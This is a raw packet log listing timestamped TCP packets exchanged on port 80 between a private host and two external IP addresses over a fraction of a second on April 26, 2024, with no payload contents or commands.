Apr 26, 2024 23:09:02.328255892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328303099 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328345060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328396082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328408003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328485012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328547955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328597069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328617096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328663111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328684092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328711987 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328735113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328749895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328756094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328766108 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328789949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328807116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328816891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328852892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328888893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328897953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328928947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328943968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328964949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328979015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328989029 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329005957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329024076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329031944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329045057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329055071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329067945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329077005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329092026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329118967 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329129934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329174995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329206944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329220057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329242945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329248905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329296112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329308033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329360962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329374075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329413891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329418898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329456091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329464912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329503059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329509974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329556942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329771042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329818964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329833031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329876900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329889059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329900980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329931021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329942942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.329948902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.329989910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330038071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330096960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330107927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330123901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330137014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330144882 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330154896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330163956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330188036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330199003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330212116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330220938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330240965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330262899 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330284119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330290079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330302000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330312967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330343962 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330451965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330463886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.330497026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.330523968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331531048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331600904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331660032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331707001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331717968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331728935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331741095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331758976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331779957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331788063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331861019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331870079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331878901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.331902027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.331918955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.332077980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.332088947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.332104921 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.332123041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.332154989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.333040953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.333087921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.471745968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.471801996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.471858978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.530134916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.530173063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.530226946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577344894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577358961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577406883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577547073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577559948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577570915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577581882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577593088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577615023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577630043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577640057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577682972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577716112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577728987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577749014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577765942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577785015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577797890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577831984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577872992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577923059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.577948093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.577991009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578003883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578052044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578074932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578088045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578123093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578150988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578162909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578174114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578193903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578202009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578208923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578229904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578258991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578279972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578304052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578321934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578334093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578346014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578347921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578377008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578389883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578413010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578434944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578458071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578502893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578521013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578533888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578574896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578591108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578603029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578613043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578644037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578677893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578725100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578742981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578785896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578831911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578856945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578886032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578933954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.578938961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578954935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578967094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.578994036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579015017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579061031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579098940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579174042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579186916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579225063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579231024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579243898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579265118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579276085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579288006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579302073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579313993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579329014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579346895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579349995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579360962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579390049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579400063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579421997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579441071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579442978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579467058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579485893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579510927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.579523087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579559088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.579576015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579595089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.579610109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579619884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.579628944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579648018 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.579670906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.579747915 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579935074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.579951048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579982042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.579993010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580030918 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580054998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580107927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580120087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580157995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580167055 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580177069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580207109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580229998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580267906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580280066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580279112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.580319881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.580329895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580382109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580410957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580423117 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580461025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580476999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580548048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580559969 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580585957 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580598116 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580605030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580630064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580693960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580739975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580779076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580792904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580797911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.580806017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580853939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580867052 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.580879927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580910921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.580923080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580934048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.580971003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.580991030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581005096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581032038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.581058025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581070900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581094980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581141949 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581151009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581161022 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581182003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581204891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.581227064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581227064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581249952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581269979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581301928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581320047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581372976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581386089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581418037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581429958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581437111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581446886 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581459045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581468105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581476927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581490993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581496000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581506968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581517935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581546068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581556082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581566095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581590891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581613064 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581619024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581655025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581705093 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581717968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581729889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581742048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581772089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581785917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581794024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581805944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581835985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581845045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581854105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581871986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.581876040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.581918001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.581929922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581942081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581964016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581971884 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581983089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.581990004 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.581999063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582011938 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582058907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582066059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582081079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582118034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582125902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582160950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582170963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582184076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582194090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582205057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582214117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582237005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.582259893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582271099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582283974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582328081 CEST	49734	80	192.168.2.4	176.97.76.106
